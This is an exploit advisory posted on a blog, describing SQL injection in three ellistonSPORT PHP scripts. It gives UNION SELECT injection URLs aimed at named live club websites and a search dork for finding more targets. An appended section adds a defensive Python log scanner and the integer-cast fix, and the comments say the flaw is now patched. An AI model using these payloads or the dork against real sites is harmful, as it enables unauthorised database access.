ellistonSPORT Multiple SQL Injection Vuln

[o] ellistonSPORT Multiple SQL Injection Vulnerability
Software : ellistonSPORT
Vendor : http://ellistonsport.com/
Demo : http://demo.ellistonsport.com/index.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.


[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php

[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]

[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--
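From the defender's side, every vector above has the same shape: an `id` parameter that the application should only ever receive as an integer, arriving with a boolean condition and a `UNION SELECT` appended. The following Python script is an added example, not part of this advisory or of ellistonSPORT, that scans constructed Apache combined-format log lines (sample data, not real traffic) for requests to the three scripts named above whose `id` is not a plain integer, and classifies the non-integer ones. The script names and the integer-only rule come from the advisory; the log format, IP addresses and timestamps are assumptions made for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The injected
# values reuse the advisory's own PoC pattern; one is percent-encoded to show
# that matching must happen after decoding the query string.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2010:10:01:02 +0000] "GET /showPlayer.php?id=101 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2010:10:01:09 +0000] "GET /showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()-- HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Mar/2010:10:02:30 +0000] "GET /showNews.php?id=363 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.12 - - [12/Mar/2010:10:03:41 +0000] "GET /showPage.php?id=10%20AND%201%3D2%20UNION%20SELECT%201%2Cversion()%2Cdatabase()%2C4-- HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Mar/2010:10:03:55 +0000] "GET /showNews.php?id=363abc HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.13 - - [12/Mar/2010:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined log format: client IP, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)

# The three scripts the advisory lists; each takes an integer id parameter.
VULN_SCRIPTS = {"/showPlayer.php", "/showPage.php", "/showNews.php"}

# The advisory's PoC relies on UNION SELECT to pull version()/database()
# into the result set, so that token pair is what we classify explicitly.
UNION_RE = re.compile(r'\bunion\b\s+(?:all\s+)?\bselect\b', re.IGNORECASE)


def check_id(decoded_value):
    """Classify one already-decoded id value.

    Returns 'ok' for a plain integer, 'union-sqli' when a UNION SELECT
    is present, and 'non-integer' for anything else that the application
    should reject before it reaches the database.
    """
    if re.fullmatch(r'\d+', decoded_value):
        return 'ok'
    if UNION_RE.search(decoded_value):
        return 'union-sqli'
    return 'non-integer'


def scan_log(text):
    """Return (client_ip, script, verdict) for every suspicious id seen."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        parts = urlsplit(m.group('target'))
        if parts.path not in VULN_SCRIPTS:
            continue
        # parse_qs decodes '+' and %XX exactly once, so the values it yields
        # are what the PHP script would have seen in $_GET['id'].
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get('id', []):
            verdict = check_id(value)
            if verdict != 'ok':
                findings.append((m.group('ip'), parts.path, verdict))
    return findings


if __name__ == "__main__":
    for ip, script, verdict in scan_log(SAMPLE_LOG):
        print(f"{ip} {script} {verdict}")
```

The same `\d+` rule that drives the detection is also the application-side fix: casting `id` to an integer (or binding it as an integer parameter in a prepared statement) before it is used in a query leaves nothing for `UNION SELECT` to attach to. Decoding once, via `parse_qs`, matters because the percent-encoded request would otherwise slip past a naive substring match on the raw log line.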

[o] Dork
"Powered by ellistonSPORT"



[o] Notes
This is a private script and all targets are on one IP address.


Comments

Anonymous said…
It looks like it has been fixed now.
evilc0de said…
yeah it seems like they already fixed that vuln. I told the vendor before I posted it here but there was no "thank you" from them.. whatever!! lol